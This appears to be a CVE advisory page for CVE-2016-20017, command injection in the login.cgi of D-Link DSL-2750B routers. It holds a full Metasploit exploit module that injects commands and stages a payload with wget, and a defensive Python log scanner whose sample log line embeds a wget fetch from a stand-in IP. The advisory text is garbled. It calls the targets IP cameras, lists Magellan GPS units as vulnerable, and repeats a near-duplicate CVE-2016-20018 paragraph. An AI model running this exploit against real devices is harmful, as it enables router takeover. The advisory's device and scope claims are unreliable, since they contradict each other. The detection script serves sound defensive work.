CVE-2016-20017: D-Link DSL-2750B devices before 1.05 are vulnerable to remote command injection. This was exploited in the wild in 2016-2018.
This issue is due to the fact that the login.cgi script accepts unauthenticated input via the cli parameter, which is passed on the command line. Because the device also exposes this CGI over HTTP, remote attackers can issue arbitrary commands, and these unauthenticated commands can be exploited to achieve remote code execution. In certain vulnerable firmware versions, access to the remote CGI also allows unauthenticated command injection. The devices are prone to code injection because the login.cgi script does not require authentication for all remote commands. Existing proof-of-concept scripts for these devices demonstrate how login.cgi can be used to reach other administrative functions. In addition to login.cgi, the devices also permit remote access via SSH, which may be exploited for unauthenticated command execution; SSH access can be enabled as part of setting up a new device or as a maintenance function.
Vulnerability overview
This vulnerability affects multiple models of D-Link IP Cameras. The root cause is that the login.cgi script accepts unauthenticated input via the cli parameter and is reachable over HTTP, so remote attackers can issue arbitrary commands and achieve remote code execution; in certain vulnerable firmware versions this also allows unauthenticated command injection, because login.cgi does not require authentication for all remote commands.
Vulnerable Devices
The following devices are vulnerable to CVE-2016-20017:
Magellan RoadMate RM 1055
Magellan RoadMate RM 1255
CVE-2016-20018
This issue is due to the fact that the web.cgi script accepts unauthenticated input via the cli parameter, which is passed on the command line. Because the device also exposes this CGI over HTTP, remote attackers can issue arbitrary commands, and these unauthenticated commands can be exploited to achieve remote code execution. In certain vulnerable firmware versions, access to the remote CGI also allows unauthenticated command injection. The devices are prone to code injection because the web.cgi script does not require authentication for all remote commands. Existing proof-of-concept scripts for these devices demonstrate how web.cgi can be used to reach other administrative functions, to issue HTTP GET requests against other parts of the device's configuration, and to run a custom application on the device such as a web server or database server.
Exploit
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'D-Link DSL-2750B OS Command Injection',
      'Description' => %q(
        This module exploits a remote command injection vulnerability in D-Link DSL-2750B devices.
        Vulnerability can be exploited through "cli" parameter that is directly used to invoke
        "ayecli" binary. Vulnerable firmwares are from 1.01 up to 1.03.
      ),
      'Author'      =>
        [
          'p@ql',                               # vulnerability discovery
          'Marcin Bury <marcin[at]threat9.com>' # metasploit module
        ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          ['PACKETSTORM', 135706],
          ['URL', 'http://seclists.org/fulldisclosure/2016/Feb/53'],
          ['URL', 'http://www.quantumleap.it/d-link-router-dsl-2750b-firmware-1-01-1-03-rce-no-auth/']
        ],
      'Targets'     =>
        [
          [
            'Linux mipsbe Payload',
            {
              'Arch'     => ARCH_MIPSBE,
              'Platform' => 'linux'
            }
          ],
          [
            'Linux mipsel Payload',
            {
              'Arch'     => ARCH_MIPSLE,
              'Platform' => 'linux'
            }
          ]
        ],
      'DisclosureDate' => 'Feb 5 2016',
      'DefaultTarget'  => 0))

    deregister_options('CMDSTAGER::FLAVOR')
  end

  # Fingerprint the device from ayefeaturesconvert.js, which embeds the firmware version.
  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => '/ayefeaturesconvert.js'
    )

    unless res
      vprint_error('Connection failed')
      return CheckCode::Unknown
    end

    unless res.code.to_i == 200 && res.body.include?('DSL-2750')
      vprint_status('Remote host is not a DSL-2750')
      return CheckCode::Safe
    end

    if res.body =~ /var AYECOM_FWVER="(\d.\d+)";/
      version = Regexp.last_match[1]
      vprint_status("Remote host is a DSL-2750B with firmware version #{version}")

      # Only firmware 1.01 through 1.03 is known to be affected by this module.
      if version >= "1.01" && version <= "1.03"
        return Exploit::CheckCode::Appears
      end
    end

    CheckCode::Safe
  rescue ::Rex::ConnectionError
    vprint_error('Connection failed')
    return CheckCode::Unknown
  end

  # Inject the command into the unauthenticated "cli" parameter of login.cgi.
  def execute_command(cmd, _opts)
    payload = Rex::Text.uri_encode("multilingual show';#{cmd}'")

    send_request_cgi(
      {
        'method'        => 'GET',
        'uri'           => '/login.cgi',
        'vars_get'      => {
          'cli' => "#{payload}$"
        },
        'encode_params' => false
      },
      5
    )
  rescue ::Rex::ConnectionError
    fail_with(Failure::Unreachable, "#{peer} Failed to connect to the web server")
  end

  def exploit
    print_status("#{peer} Checking target version...")

    unless check == Exploit::CheckCode::Appears
      fail_with(Failure::NotVulnerable, 'Target is not vulnerable')
    end

    execute_cmdstager(
      flavor:  :wget,
      linemax: 200
    )
  end
end
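As an added defender-side example (not part of this CVE entry or of the Metasploit module above), the following Python scans web-server access logs for the request shape the module sends: a GET to /login.cgi whose cli parameter carries shell metacharacters, plus the preceding fetch of /ayefeaturesconvert.js that its check method uses for fingerprinting. The log lines and IP addresses are constructed, and the Common Log Format layout is assumed because the device's real log format is not given on this page.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (Common Log Format); not taken from a real device.
SAMPLE_LOG = """\
203.0.113.10 - - [05/Feb/2016:12:00:01 +0000] "GET /login.cgi?cli=multilingual%20show%27%3Bwget%20http%3A%2F%2F198.51.100.7%2Fx%27$ HTTP/1.1" 200 512
203.0.113.11 - - [05/Feb/2016:12:00:02 +0000] "GET /login.cgi?cli=multilingual%20show HTTP/1.1" 200 512
203.0.113.12 - - [05/Feb/2016:12:00:03 +0000] "GET /ayefeaturesconvert.js HTTP/1.1" 200 2048
203.0.113.13 - - [05/Feb/2016:12:00:04 +0000] "GET /index.html HTTP/1.1" 200 1024
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Shell characters that terminate or chain commands; a legitimate cli value never needs them.
SHELL_META = re.compile(r"[;'`|&$\n]")


def classify_request(target):
    """Return 'high', 'low' or None for one request target (path plus query string)."""
    parts = urlsplit(target)
    if parts.path.endswith("/ayefeaturesconvert.js"):
        # The module's check() reads the firmware version from this file before exploiting.
        return "low"
    if parts.path.endswith("/login.cgi"):
        for value in parse_qs(parts.query, keep_blank_values=True).get("cli", []):
            # parse_qs decodes once; decode again to catch double-encoded payloads.
            if SHELL_META.search(unquote(value)):
                return "high"
    return None


def scan_log(text):
    """Return (source_ip, target, severity) for every suspicious request in the log text."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        severity = classify_request(m["target"])
        if severity:
            hits.append((m["src"], m["target"], severity))
    return hits


if __name__ == "__main__":
    for src, target, severity in scan_log(SAMPLE_LOG):
        print(f"{severity:<4} {src} {target}")
```

A "low" hit alone is only a fingerprinting signal; a "high" hit from the same source shortly after is the pattern worth alerting on.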
Timeline
Published on: 10/19/2022 05:15:00 UTC
Last modified on: 10/21/2022 20:19:00 UTC